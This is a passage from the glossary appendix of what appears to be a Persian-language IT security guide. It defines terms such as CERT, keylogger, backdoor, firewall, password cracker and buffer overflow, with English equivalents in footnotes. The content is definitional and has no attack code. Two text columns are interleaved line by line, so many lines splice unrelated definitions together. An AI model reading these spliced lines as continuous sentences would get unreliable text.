‫ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ )‪(CERT‬‬ ‫ﺗﺴﺨﻴﺮ‬
‫ﺍﻳﻦ ﺗﻴﻢ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ‪ ٣٩٧‬ﻭ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﺔ ﻳـﻚ ﻛـﺮﻡ‬ ‫ﻧﻘﺾ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻛـﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ٣٩٨‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۸‬ﺍﻳﺠﺎﺩ ﺷﺪ‪.‬‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺗﻐﻴﻴﺮ‪ ،‬ﺗﺨﺮﻳﺐ‪ ،‬ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ‪.‬‬

‫‪٣٩١‬‬
‫‪٣٩٩‬‬
‫ﺛﺒﺖ‬ ‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ‬ ‫ﻓﺮﺁﻳﻨﺪ ﺍﺣﺮﺍﺯ ﺣﻖ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﺑﺮﺍﻱ ﻳﻚ ﺳﺮﻭﻳﺲ ﻳﺎ ﻛﺎﺭﺑﺮ‬
‫ﺁﺗﺶ ﻳﺎ ﺷﺒﻜﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻧﺪ‪.‬‬ ‫ﻲ ﺁﻥ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﻛـﻪ ﺩﺭﺧﻮﺍﺳـﺖ ﻛـﺮﺩﻩ‬ ‫ﭘﻴﺶ ﺍﺯ ﺣﻖ ﺩﺳﺘﺮﺳ ﹺ‬
‫ﺍﺳﺖ‪ .‬ﻃﻲ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﻛﺎﺭﺑﺮ ﻳﻚ ﻧﺎﻡ ﻳﺎ ﺷـﻤﺎﺭﺓ ﺣـﺴﺎﺏ )ﺑـﺮﺍﻱ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﻣﻌﺮﻓﻲ ﻫﻮﻳﺖ( ﻭ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ )ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﻧـﺸﺎﻥ ﺑـﺮﺍﻱ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺧﻮﺩ( ﻭﺍﺭﺩ ﻣﻲﻛﻨﺪ‪.‬‬


‫‪392 Two-Factor Authentication‬‬
‫‪393 Snapshot‬‬
‫‪394 Attack‬‬ ‫‪386 Access Authorization‬‬
‫‪395 Threat‬‬ ‫‪387 Bulletin Board‬‬
‫‪396 Computer Emergency Response Team‬‬ ‫‪388 Risk Analysis‬‬
‫‪397 Carengie Mellon‬‬ ‫‪389 Denial of Service‬‬
‫‪398 Internet Worm‬‬ ‫‪390 Compromise‬‬
‫‪399 Logging‬‬ ‫‪391 Authentication‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٥٨‬‬

‫‪٤٠٠‬‬
‫ﻳﺎ ﺁﮔﺎﻫﻲ ﺷﻤﺎ ﻛﻨﺘﺮﻝ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺩﺳﺖ ﺑﮕﻴﺮﺩ‪ .‬ﺩﺭﺏ ﻣﺨﻔﻲ‬ ‫ﺛﺒﺖﻛﻨﻨﺪﺓ ﺻﻔﺤﻪﻛﻠﻴﺪ‬
‫ﻫﻤﻴــﺸﻪ ﻣﺨــﺮﺏ ﻧﻴــﺴﺖ؛ ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺩﺭ‬ ‫ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﻛﻪ ﻫﺮﺁﻧﭽﻪ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺗﺎﻳﭗ ﻣﻲﺷﻮﺩ ﺭﺍ ﺫﺧﻴﺮﻩ‬
‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻣﺨـﺼﻮﺻﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗـﺎ‬ ‫ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﻧﻮﺷـﺘﻪ ﻭ ﻳـﺎ ﺍﺯ‬
‫ﺗﻜﻨﻴﺴﻴﻨﻬﺎﻱ ﺑﺨﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺭﺍ ﺍﺯ ﺭﺍﻩ‬ ‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺷﺨـﺼﻲ ﺍﺭﺳـﺎﻝ ﺷـﻮﻧﺪ‪ .‬ﺍﮔـﺮ ﺭﻭﻱ ﻳـﻚ‬
‫ﺩﻭﺭ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ .‬ﺍﻣـﺎ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‬ ‫ﺭﺍﻳﺎﻧﻪ ﺑﺮﻧﺎﻣﺔ ﺛﺒﺖﻛﻨﻨﺪﺓ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧـﺼﺐ ﺑﺎﺷـﺪ‪ ،‬ﻫﺮﭼـﻪ ﻭﺍﺭﺩ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﻬﺎﺟﻢ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﻧﻴﺰ ﺑﻜﺎﺭ ﺭﻭﻧـﺪ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪ ﺷﻮﺩ ‪ -‬ﺍﺯ ﺟﻤﻠﻪ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ‪ -‬ﺫﺧﻴـﺮﻩ‬
‫ﺩﺭﺏ ﻣﺨﻔﻲ ﺑﺎ ﻋﻨﻮﺍﻥ "‪ "trap door‬ﻧﻴﺰ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﻣﻲﺷﻮﺩ؛ ﺩﺭﺳﺖ ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﻫﻨﮕـﺎﻡ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ‪،‬‬
‫ﻳﻜﻨﻔﺮ ﺍﺯ ﺑﺎﻻﻱ ﺷﺎﻧﺔﺗﺎﻥ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺯﻳﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫‪٤٠٦‬‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ‬
‫‪٤٠١‬‬
‫ﺩﺭﺻﺪﻱ ﺍﺯ ﺯﻣﺎﻥ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬ ‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬ ‫ﻫﺮ ﻧﻮﻉ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﺮﺗﺒﻂ ﺑـﺎ ﺍﻃﻼﻋـﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ‪.‬‬
‫‪٤٠٧‬‬
‫ﺩﺭﻭﺍﺯﻩ‬
‫‪٤٠٢‬‬
‫ﻳﻚ ﭘﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﻪ‪.‬‬ ‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﺣﻔﺎﻇـﺖ ﻳــﻚ ﺷــﺮﻛﺖ ﺍﺯ ﺍﻓــﺸﺎﻱ ﺩﺍﺩﻩﻫــﺎ ﺗﻮﺳــﻂ ﮔﺮﻭﻫﻬــﺎﻱ‬
‫‪٤٠٨‬‬
‫ﺩﺳﺘﺮﺳﻲ‬ ‫ﻏﻴﺮﻣﺠﺎﺯ‪ .‬ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺳـﻄﺤﻲ ﺍﺯ‬
‫ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗﻮﺍﻧـﺎﻳﻲ‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﻣﺒﻨـﻲ ﺑـﺮ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﺳـﺮﺍﺭ ﻣﺤﺮﻣﺎﻧـﺔ ﺣـﺮﻳﻢ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺧﻮﺍﻧﺪﻥ‪ ،‬ﻧﻮﺷﺘﻦ‪ ،‬ﺍﺻﻼﺡ ﻛـﺮﺩﻥ ﻭ ﻳـﺎ‬ ‫ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻓﺸﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫـﺮ ﻳـﻚ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺩﺳﺘﺮﺳـﻲ‬
‫‪٤٠٣‬‬
‫ﻣﻲﻧﺎﻣﻴﻢ‪.‬‬ ‫ﺣﻤﻼﺕ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ‬
‫ﺻﻮﺭﺗﻲ ﺍﺯ ﺣﻤﻠـﻪ ﻛـﻪ ﺑـﻪ ﺷـﻜﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻇـﺎﻫﺮﹰﺍ ﺑـﻲﺿـﺮﺭ‬
‫‪٤٠٩‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬ ‫ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﻳﺎ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﻤﻠﻪ ﺭﺍ‬
‫ﻛﻨﺘﺮﻝ ﻳﻚ ﻭﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍﻩ ﺩﻭﺭ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄـﻮﻁ ﺍﺭﺗﺒـﺎﻃﻲ‬ ‫ﺍﻧﺠﺎﻡ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺣﻤﻼﺕ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻳﻚ ﻣﺴﺌﻠﻪ ﺟﺪﻱ‬
‫ﻣﺜﻞ ﺗﻠﻔﻦ ﻣﻌﻤﻮﻟﻲ ﻳﺎ ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ‪.‬‬ ‫ﺣﺘﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﻔﺎﻇﺖﺷـﺪﻩ ﻫـﺴﺘﻨﺪ؛ ﭼﺮﺍﻛـﻪ ﻣﻤﻜـﻦ‬
‫‪٤١٠‬‬ ‫ﺍﺳﺖ ﺩﺭ ﻗﺎﻟﺐ ﺩﺍﺩﻩ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺑﺮﺳﻨﺪ ﻭ ﺣﻤﻼﺗﻲ ﻋﻠﻴﻪ‬
‫ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺖ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺷﺮﻭﻉ ﻛﻨﻨﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮ ﺳﻴﺴﺘﻢ ﺷﺒﻜﻪ ﺑﻪ ﻧﻮﺑﺔ ﺧﻮﺩ ﺗﺎ‬
‫ﺁﺧﺮﻳﻦ ﺣﺪ ﻣﻤﻜﻦ ﺍﻳﻤﻦ ﻣﻲﺷﻮﺩ‪.‬‬ ‫‪٤٠٤‬‬
‫ﺣﻤﻠﺔ ﻋﻨﺼﺮ ﺩﺍﺧﻠﻲ‬
‫‪٤١١‬‬ ‫ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺍﺯ ﺩﺭﻭﻥ ﻳﻚ ﺷﺒﻜﻪ ﺣﻔﺎﻇﺖ ﺷﺪﻩ ﻧﺎﺷﻲ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺘﻲ ﻛﻪ ﺟﺮﻳﺎﻥ ﺗﺮﺍﻓﻴﻚ ﻭﺭﻭﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎ ﻭ‬ ‫‪٤٠٥‬‬
‫ﺩﺭﺏ ﻣﺨﻔﻲ‬
‫ﮔﺎﻫﻲ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ‪ .‬ﺑـﺮﺍﻱ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ‬ ‫ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺑﻼﻣﻮﺿﻮﻉ ﻛﺮﺩﻥ ﺭﻭﺍﻝ ﻭﺭﻭﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺑﺪﺳـﺖ‬
‫ﭘﻴﻜﺮﺑﻨــﺪﻳﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺻــﺎﻓﻲﻫــﺎ‪،‬‬ ‫ﮔﺮﻓﺘﻦ ﻛﻨﺘﺮﻝ ﺭﺍﻳﺎﻧﻪ ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﻛﺴﺐ ﺭﺿﺎﻳﺖ ﻣﺎﻟﻚ ﺁﻥ‪ .‬ﺍﮔﺮ‬
‫ﺗﻘﻮﻳﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‪ ،‬ﺭﻣﺰﮔـﺬﺍﺭﻱ‪ ،‬ﺍﻳﺠـﺎﺩ‬ ‫ﺩﺭﺏ ﻣﺨﻔﻲ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﺪ‪،‬‬
‫ﻣﻨﻄﻘﺔ ﻏﻴﺮﻧﻈﺎﻣﻲ )‪ ،(DMZ‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣـﺸﺎﺑﻪ‪ .‬ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺨﺼﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺘﻮﺍﻧﺪ ﺑـﺪﻭﻥ ﺗﺄﻳﻴـﺪ‬
‫ﺁﺗﺶ ﺑﻪ ﺩﻭ ﺷﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ :‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ‬

‫‪406 Availability‬‬ ‫‪400 Keyboard Logger‬‬


‫‪407 Gateway‬‬ ‫‪401 Computer Crime‬‬
‫‪408 Access‬‬ ‫‪402 Privacy‬‬
‫‪409 Remote Access‬‬ ‫‪403 Data-Driven Attacks‬‬
‫‪410 Defense in Depth‬‬ ‫‪404 Insider Attack‬‬
‫‪411 Firewall‬‬ ‫‪405 Backdoor‬‬
‫‪٤٥٩‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٤١٧‬‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ‪ ،‬ﻭ ﻳﺎ ﻣﻤﻜـﻦ‬
‫ﺗﺒﺪﻳﻞ ﻣﺘﻮﻥ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﺓ ﺍﻭﻟﻴﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ‬ ‫ﺍﺳﺖ ﻳﻚ ﻗﻄﻌﺔ ﻣﺠﺰﺍﻱ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺑـﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﺘﻘﺎﺑﻞ‪.‬‬ ‫ﺁﻧﭽﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﻭ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ﻧﻈﺎﺭﺕ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻗﺎﺩﺭﻧﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺷﻤﺎ ﻭ ﺩﻧﻴﺎﻱ ﺧـﺎﺭﺝ ﺭﺍ‬
‫‪٤١٨‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ‬ ‫ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﺍﻧﺘﻘﺎﻻﺕ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ‬
‫ﻳﻚ ﺷﺎﺧﻪ ﺍﺯ ﻋﻠﻢ ﺭﻳﺎﺿﻲ ﻛﻪ ﺑﺎ ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ‬ ‫ﻳﺎ ﻏﻴﺮﻣﺠﺎﺯ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ‪.‬‬
‫ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬﻮﻡ ﺁﻥ‪ ،‬ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺨﻔﻴﺎﻧـﺔ‬
‫‪٤١٢‬‬
‫ﺩﺍﺩﻩ‪ ،‬ﻭ ﻣﻤﺎﻧﻌﺖ ﺍﺯ ﻛـﺎﺭﺑﺮﺩ ﻏﻴﺮﻣﺠـﺎﺯ ﺁﻥ ﺳـﺮ ﻭ ﻛـﺎﺭ ﺩﺍﺭﺩ‪ .‬ﺍﮔـﺮ‬ ‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺭ ﺳﻄﺢ ﺷﺒﻜﻪ‬
‫ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺑﺮﮔـﺸﺖﭘـﺬﻳﺮ ﺑﺎﺷـﺪ‪ ،‬ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺷـﺎﻣﻞ ﺗﺒـﺪﻳﻞ‬ ‫ﻞ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺸﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺗﺮﺍﻓﻴﻚ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪﻫـﺎﻱ ﭘﺮﻭﺗﻜـ ﹺ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﺷﺒﻜﻪ ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬

‫‪٤١٩‬‬ ‫‪٤١٣‬‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫ﺭﻣﺰﺷﻜﻦ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ‪ ،‬ﭘﻴﻜﺮﺑﻨـﺪﻱﻫـﺎ‪ ،‬ﻭ ﺗﻮﺻـﻴﻪ ﻫـﺎﻱ‬ ‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﺎﻣﻞ ﻓﺮﻫﻨﮕﻬﺎﻱ ﻟﻐﺎﺕ ﻛﺎﻣﻞ ﻛﻪ ﺳـﻌﻲ‬
‫ﻣﺸﺮﻭﺡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ‪.‬‬ ‫ﺩﺭ ﻳﺎﻓﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺭﺩ‪.‬‬

‫‪٤٢٠‬‬ ‫‪٤١٤‬‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ‬ ‫ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺭﺳﻤﻲ ﻭ ﻣﻜﺘﻮﺏ ﻛﻪ ﮔﺎﻣﻬﺎﻱ ﻻﺯﻡ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳـﻚ‬ ‫ﻳﻚ ﻛﺪ ﻣﺨﻔﻲ ﻛﻪ ﺑﻪ ﻫﺮ ﻛﺎﺭﺑﺮ )ﻳﺎ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺑﮕﻮﻳﻴﻢ ﺑﻪ ﻫﺮ ﻧﺎﻡ‬
‫ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻱ ﻣﺜﻞ ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‪ .‬ﺗﻬﻴـﻪ‬ ‫ﻛﺎﺭﺑﺮﻱ( ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﻴـﺴﺘﻢ ﺍﺯ ﺁﻥ ﻣﻄﻠـﻊ ﺍﺳـﺖ‪.‬‬
‫ﺟﺰﺋﻴﺎﺕ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺶ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧـﺪﺍﺩ‪ ،‬ﻣﺸﺨـﺼﺔ‬ ‫ﻻ ﺑﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬ ‫ﺩﺍﻧﺴﺘﻦ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺻﻠﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﺑﺎ ﻃﺮﺍﺣﻲ ﺧﻮﺏ ﺍﺳﺖ‪.‬‬ ‫ﻭ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﻣﻨﺠﺮ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪٤٢١‬‬ ‫‪٤١٥‬‬
‫ﺳﺮﺭﻳﺰﻱ ‪buffer‬‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﻳﻚ ﻧﻘﺺ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩﻫـﺎ‬ ‫ﻓﺮﺁﻳﻨﺪ ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﻣﺤﺘﻮﻳﺎﺕ ﻓﺎﻳﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴـﺮ ﻳـﻚ‬
‫ﺭﺍ ﺑﻪ ﻓﻀﺎﻳﻲ ﺩﺭ ﺣﺎﻓﻈﻪ ﻣﻲﺑﺮﺩ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﺁﻥ ﻗـﺴﻤﺖ ﺍﺯ ﺣﺎﻓﻈـﻪ‬ ‫ﺭﺷﺘﻪ ﺍﺯ ﺣﺮﻭﻑ ﺑﻪ ﻳﻚ ﺭﺷﺘﺔ ﺩﻳﮕﺮ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ‬
